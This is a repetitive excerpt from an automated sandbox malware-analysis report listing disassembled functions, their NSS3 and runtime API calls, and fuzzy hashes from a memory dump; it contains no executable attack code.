Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: memcpystrlen$memset
String ID:
API String ID: 638109778-0
Opcode ID: 718463002372e5be8b06df56c246ca3c5b3bf925a45da6d2c2749aa36897394e
Instruction ID: 94db255f5fc88d86c602ac983454b2262780861dde00b8d92840941b6c63b1a5
Opcode Fuzzy Hash: 718463002372e5be8b06df56c246ca3c5b3bf925a45da6d2c2749aa36897394e
Instruction Fuzzy Hash: 08C1B071F003069BEB04CF69CC987AAB7A5EF88304F168269D9199B751D770EC42CBD9

Function 6C5EA910 Relevance: 7.7, APIs: 5, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4fab01aef37fcb6ba54636ff593ff1df5e352e5e648f97761c9725778a95b0
Instruction ID: 482c639f07ca830e4d7dba7c946661b9a968aa0b7cd106d89d197970be3cfeb7
Opcode Fuzzy Hash: 2b4fab01aef37fcb6ba54636ff593ff1df5e352e5e648f97761c9725778a95b0
Instruction Fuzzy Hash: B591AE717002089FEB08DFB5ED99B6B3BB9FB4A305F14047DE54687A40DB34A845CB96

Function 6C658B50 Relevance: 7.7, APIs: 5, Instructions: 218COMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3 ref: 6C658B5C
CERT_DecodeAVAValue.NSS3 ref: 6C658B67

Part of subcall function 6C658E00: PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C658EED
Part of subcall function 6C658E00: SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C7818D0,?), ref: 6C658F03
Part of subcall function 6C658E00: PR_CallOnce.NSS3(6C7B2AA4,6C6B12D0), ref: 6C658F19
Part of subcall function 6C658E00: PL_FreeArenaPool.NSS3(?), ref: 6C658F2B

SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C658D5C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C658D6B
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C658D76

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Item_Util$Decode$ArenaPoolValueZfree$CallCompareFreeInitOnceQuick
String ID:
API String ID: 185717074-0
Opcode ID: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction ID: bbbdae4dadae68f785b10ed3686787a3b09793df4c934d0ec65a9ccdf5d0ba9e
Opcode Fuzzy Hash: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction Fuzzy Hash: 31713671F912298FDB108B5988507EAB7F1EB4D324FA94366D824A7FA2D3349C11C798

Function 6C5F6D2E Relevance: 7.6, APIs: 5, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 6C5E3C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5E3C66
Part of subcall function 6C5E3C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C5E3D04

memcpy.VCRUNTIME140(?,?,?), ref: 6C5F6DC0
memcpy.VCRUNTIME140(?,?,?), ref: 6C5F6DE5

Part of subcall function 6C5F8010: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5F807D
Part of subcall function 6C5F8010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5F80D1
Part of subcall function 6C5F8010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5F810E
Part of subcall function 6C5F8010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5F8140

memcpy.VCRUNTIME140(00000004,00000004,00000000), ref: 6C5F6E7E
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5F6E96
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5F6EC2

Part of subcall function 6C5F7D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5F7E27
Part of subcall function 6C5F7D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5F7E67

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: _byteswap_ulong$memcpy$_byteswap_ushort
String ID:
API String ID: 3070372028-0
Opcode ID: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
Instruction ID: 04b48f855a44b2c123d27a1a534bced437fcab2df5d6d7b43ce351f294d3b04d
Opcode Fuzzy Hash: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
Instruction Fuzzy Hash: FE517C719083519FD725CF25C850B6ABBE5BF88318F048A5DE8A987B41E730E919CF92

Function 6C66C9E0 Relevance: 7.6, APIs: 5, Instructions: 132COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,00000000), ref: 6C66CA21
EnterCriticalSection.KERNEL32(0000001C), ref: 6C66CA35
PR_Unlock.NSS3(00000000), ref: 6C66CA66
PR_SetError.NSS3(FFFFE041,00000000,00000000,?,?,00000000), ref: 6C66CA77
PR_Unlock.NSS3(00000000), ref: 6C66CAFC

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID:
API String ID: 1974170392-0
Opcode ID: 5ba1b20463d7b5c63b2267d24e64001762c292801d697eb690a1f7d5b9cf03a8
Instruction ID: b847c65ee4f8a888c015c2ec10a8cc8717619067af30dff75a864027f17c0198
Opcode Fuzzy Hash: 5ba1b20463d7b5c63b2267d24e64001762c292801d697eb690a1f7d5b9cf03a8
Instruction Fuzzy Hash: 59412575E00605ABDF00EF66D840AAB7BB4EF45388F144064ED1A97B00EB31E911CBEA

Function 6C6C4A00 Relevance: 7.6, APIs: 5, Instructions: 126threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C6C4A8D
CERT_SaveSMimeProfile.NSS3(00000000,00000000,00000000), ref: 6C6C4B01
CERT_DestroyCertificate.NSS3(00000000), ref: 6C6C4B12
PR_SetError.NSS3(?,00000000), ref: 6C6C4B1F
CERT_FindCertByIssuerAndSN.NSS3(?,?), ref: 6C6C4B35

Part of subcall function 6C6C04A0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,00000000), ref: 6C6C04B9
Part of subcall function 6C6C04A0: memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000), ref: 6C6C050A
Part of subcall function 6C6C04A0: memcmp.VCRUNTIME140(?,00000000,?), ref: 6C6C0545

Part of subcall function 6C6C52E0: PORT_NewArena_Util.NSS3(00000400,6C6C4A57,?,00000000), ref: 6C6C52F7
Part of subcall function 6C6C52E0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6C78301C,WJll,?,6C6C4A57,?,00000000), ref: 6C6C5312
Part of subcall function 6C6C52E0: CERT_FindCertByIssuerAndSN.NSS3(?,?,?,?,?,?,?,6C6C4A57,?,00000000), ref: 6C6C5327
Part of subcall function 6C6C52E0: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,6C6C4A57,?,00000000), ref: 6C6C5334

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Find$Arena_CertIssuermemcmp$CertificateCurrentDecodeDestroyErrorFreeItem_MimeProfileQuickSaveTag_Thread
String ID:
API String ID: 3052039812-0
Opcode ID: ff488d0bfdaa9d9114ca4ff8c2d9f5689a6ce713f08ad10dc7f2dda564d4f8b0
Instruction ID: 66854e198a306bb136064fb8f54a476e93d2293b367fa3983a589373f9988075
Opcode Fuzzy Hash: ff488d0bfdaa9d9114ca4ff8c2d9f5689a6ce713f08ad10dc7f2dda564d4f8b0
Instruction Fuzzy Hash: 4831D3B5F012006BEB14CE75AC44BBB36A8DB1231DF250134EC04AAA46EBB5D815C3AF

Function 6C696AE0 Relevance: 7.6, APIs: 6, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C696910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C696943
Part of subcall function 6C696910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C696957
Part of subcall function 6C696910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C696972
Part of subcall function 6C696910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C696983
Part of subcall function 6C696910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C6969AA
Part of subcall function 6C696910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C6969BE
Part of subcall function 6C696910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C6969D2
Part of subcall function 6C696910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C6969DF
Part of subcall function 6C696910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C696A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000,6C69781D,?,6C68BE2C,?,00000000,00000000), ref: 6C696B66
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6C69781D,?,6C68BE2C,?,00000000,00000000), ref: 6C696B88
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6C69781D,?,6C68BE2C,?,00000000,00000000), ref: 6C696BAF
free.MOZGLUE(00000000,?,?,?,?,00000000,00000000,6C69781D,?,6C68BE2C,?,00000000,00000000), ref: 6C696BE6
free.MOZGLUE(?,?,?,?,?,00000000,00000000,6C69781D,?,6C68BE2C,?,00000000,00000000), ref: 6C696BF7
free.MOZGLUE(6C69781D,?,?,?,?,00000000,00000000,6C69781D,?,6C68BE2C,?,00000000,00000000), ref: 6C696C08

Part of subcall function 6C696C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C69781D,00000000,6C68BE2C,?,6C696B1D,?,?,?,?,00000000,00000000,6C69781D), ref: 6C696C40
Part of subcall function 6C696C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C69781D,?,6C68BE2C,?), ref: 6C696C58
Part of subcall function 6C696C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C69781D), ref: 6C696C6F
Part of subcall function 6C696C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C696C84
Part of subcall function 6C696C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C696C96
Part of subcall function 6C696C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C696CAA

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: strcmpstrncmp$FlagL_strncasecmpfree$Strip$ParameterSecureSkip
String ID:
API String ID: 3779992554-0
Opcode ID: 1a5a987d422d0ae62a6b57f40c87c35fa8c6172a1128162fad063355a67273f7
Instruction ID: 23abfb311378c8ee2722685851fd277fb4261be15bfa39119789a5505c0fbbb0
Opcode Fuzzy Hash: 1a5a987d422d0ae62a6b57f40c87c35fa8c6172a1128162fad063355a67273f7
Instruction Fuzzy Hash: 624181B1E0530A9BEF40CEA5D944BEEB7B8AF06348F140025E804E3A04F735E964C7E9

Function 6C6A4B00 Relevance: 7.6, APIs: 5, Instructions: 119stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,-00000001,00000000,?,?,6C697B3B,00000000,?,?,00000000), ref: 6C6A4BA3

Part of subcall function 6C6A8970: TlsGetValue.KERNEL32(?,00000000,6C6561C4,?,6C655639,00000000), ref: 6C6A8991
Part of subcall function 6C6A8970: TlsGetValue.KERNEL32(?,?,?,?,?,6C655639,00000000), ref: 6C6A89AD
Part of subcall function 6C6A8970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C655639,00000000), ref: 6C6A89C6
Part of subcall function 6C6A8970: PR_WaitCondVar.NSS3 ref: 6C6A89F7
Part of subcall function 6C6A8970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C655639,00000000), ref: 6C6A8A0C

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C6A4B44
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C6A4B7E
SECMOD_DestroyModule.NSS3(00000000), ref: 6C6A4C44
free.MOZGLUE(?), ref: 6C6A4C54

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Valuestrcmp$CondCriticalDestroyEnterErrorModuleSectionUnlockWaitfree
String ID:
API String ID: 3094473128-0
Opcode ID: 04c9512d4814b378b6bfaf998f599c4c7ca46ee55b37747fba2edddb3b6fc493
Instruction ID: 2b026a1526b903b283fd3a7675a36f710da4d2972e203e35920e8cf15cc490a2
Opcode Fuzzy Hash: 04c9512d4814b378b6bfaf998f599c4c7ca46ee55b37747fba2edddb3b6fc493
Instruction Fuzzy Hash: 1D41D2B6A01205AFDB108F98DC45B66B3B4EF41318F145034E82AA7B10EB71FC16C7D9

Function 6C76AA70 Relevance: 7.6, APIs: 5, Instructions: 114COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C76AA86

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

Part of subcall function 6C76A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C76A662), ref: 6C76A69E
Part of subcall function 6C76A690: PR_NewCondVar.NSS3(?), ref: 6C76A6B4

PR_IntervalNow.NSS3 ref: 6C76AAEC
EnterCriticalSection.KERNEL32(?), ref: 6C76AB0A
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C76AB67
_PR_MD_UNLOCK.NSS3(?), ref: 6C76AB8B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CondCriticalEnterErrorIntervalSectionValuecalloc
String ID:
API String ID: 318662135-0
Opcode ID: d9ddf27a3ff30678e4d135e6262b4baf2930305cd839dc7bd7890637c544fdee
Instruction ID: 6037cc2559d4698a6d8eb87141e73c98e58a0d6871a5817fa76fd65b0b193910
Opcode Fuzzy Hash: d9ddf27a3ff30678e4d135e6262b4baf2930305cd839dc7bd7890637c544fdee
Instruction Fuzzy Hash: 5D4182B5A007158FC750DF2ACA8495AB7F6BF49328728456ADC19CBF01E731EC45CB90

Function 6C64EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C64EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C64EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C64EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C64EEEB
free.MOZGLUE(?), ref: 6C64EEF6

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 3184e8eda1d1ade1f997ca3184a1b9deac8741dbf9026a58758616005030ad1c
Instruction ID: 28afcd085743d4c76425754edaca64e5968d53c7264d63d4820634be28509644
Opcode Fuzzy Hash: 3184e8eda1d1ade1f997ca3184a1b9deac8741dbf9026a58758616005030ad1c
Instruction Fuzzy Hash: 6A310471A00201ABE720DF29CC44FA6BBF4FB46345F14C538E85A87A51EB31E815CBE9

Function 6C656AF0 Relevance: 7.6, APIs: 5, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(00000000,6C65B21D,00000000,00000000,6C65B219,?,6C656BFB,00000000,?,00000000,00000000,?,?,?,6C65B21D), ref: 6C656B01

Part of subcall function 6C6AFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C6AFE08
Part of subcall function 6C6AFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C6AFE1D
Part of subcall function 6C6AFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C6AFE62

PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,6C65B219,?,6C656BFB,00000000,?,00000000,00000000,?,?,?,6C65B21D), ref: 6C656B36
PORT_ArenaAlloc_Util.NSS3(00000000,00000030), ref: 6C656B47
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C656B8A
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000004,?,0000001C), ref: 6C656BB6

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Item_$DecodeQuick$Errormemcpy
String ID:
API String ID: 1773792728-0
Opcode ID: e635efd44317dad6ab20bef84e36d2129e55a2249b0319cdbe68876c6d27cadf
Instruction ID: 5b92dc0c1d1d2e6838e40567aa25269586ce70496bb4964831c3b9ccb87b3fc5
Opcode Fuzzy Hash: e635efd44317dad6ab20bef84e36d2129e55a2249b0319cdbe68876c6d27cadf
Instruction Fuzzy Hash: 7621F132D012145BEB108F65CD40F9A7BA8DB56398F644529EC08D7B11F731EAB0CBA8

Function 6C6C4BB0 Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,C083F089), ref: 6C6C4BDD

Part of subcall function 6C6B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6587ED,00000800,6C64EF74,00000000), ref: 6C6B1000
Part of subcall function 6C6B0FF0: PR_NewLock.NSS3(?,00000800,6C64EF74,00000000), ref: 6C6B1016
Part of subcall function 6C6B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6587ED,00000008,?,00000800,6C64EF74,00000000), ref: 6C6B102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,C083F089), ref: 6C6C4C03

Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B10F3
Part of subcall function 6C6B10C0: EnterCriticalSection.KERNEL32(?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B110C
Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1141
Part of subcall function 6C6B10C0: PR_Unlock.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1182
Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B119C

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,C083F089), ref: 6C6C4C15
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,C083F089), ref: 6C6C4C3E

Part of subcall function 6C6AF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C6AF0C8
Part of subcall function 6C6AF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6AF122

PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,C083F089), ref: 6C6C4C85

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Arena_$ArenaFree$Value$Alloc_AllocateCriticalEncodeEnterInitItem_LockPoolSectionUnlockcallocmemset
String ID:
API String ID: 227267669-0
Opcode ID: 6038deb040f47522f621543d87ac2b60c5b3ec35bdcb20c260507bdcda6ec165
Instruction ID: 1c1c2e4479dce8634bbff6a1e2586074586e2d763165c426459926bda975d50f
Opcode Fuzzy Hash: 6038deb040f47522f621543d87ac2b60c5b3ec35bdcb20c260507bdcda6ec165
Instruction Fuzzy Hash: E021C3B2B002156BEB104E55AC41BBB7AA8DB4236CF140135ED28976A1EBB1D81487EF

Function 6C65AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

